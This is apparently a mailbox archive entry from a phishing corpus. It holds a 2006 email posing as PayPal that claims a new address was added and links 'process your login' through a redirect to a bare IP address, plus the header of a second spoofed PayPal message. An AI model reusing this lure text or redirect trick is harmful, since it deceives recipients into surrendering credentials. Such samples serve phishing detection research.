From: Update Now <george@campecholake.com>
Subject: Notification
Date: Sat, 25 Feb 2006 08:37:29 -0500
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Message-Id: <20060225134713.C06C26CCE61@mail1.example.com>
To: undisclosed-recipients: ;
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 460

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<div align="left" class="style2">
  <p class="style2"><FONT face="Courier New" size="2">You have added <b>
	mike82@woh.rr.com</b> as a new email address for your
PayPal account.</font><br>
    <font face="Courier New" size="2">If you don't agree with this email and if you need assistance with your account,<br>
  click here and 
	<a target="_blank" href="http://rds.yahoo.com/S=44831148:D1/CS=44831148/SS=44831166/SIG=11v8331g7/*http://202.88.149.73:202/update/">process your login</a>. </font> </p>
    </p>
  <p><font face="Courier New" size="2">Thank you for using PayPal! <br>
    The PayPal Team </font> </p>
  <address><span style="font-style: normal"><font face="Courier New" size="2">Please do not reply to this email. This mailbox is not monitored and you will not receive a response.</font></span></address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">For assistance,log in to your 
  PayPal account and click thec Help link located in the top right corner </span>
  </font>
    </address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">of any 
  PayPal page. </span> <br>
    </font>
    </address>
  <p><font face="Courier New" size="2">PayPal Email ID PP007 </font> </p>
</div>
</body>
</html>

From service@paypal.com  Sat Feb 25 08:50:16 2006
Return-Path: <service@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 8642A536EA3
	for <nobody@login.example.com>; Sat, 25 Feb 2006 08:50:16 -0500 (EST)
Received: from 61.97.128.182 (unknown [61.97.128.182])
	by mail2.example.com (Postfix) with SMTP id 977F26FA2EB
	for <nobody@example.com>; Sat, 25 Feb 2006 08:50:15 -0500 (EST)
Received: from 208.4.26.96 by ; Sat, 25 Feb 2006 16:55:25 +0300
Message-ID: <@aol.com>
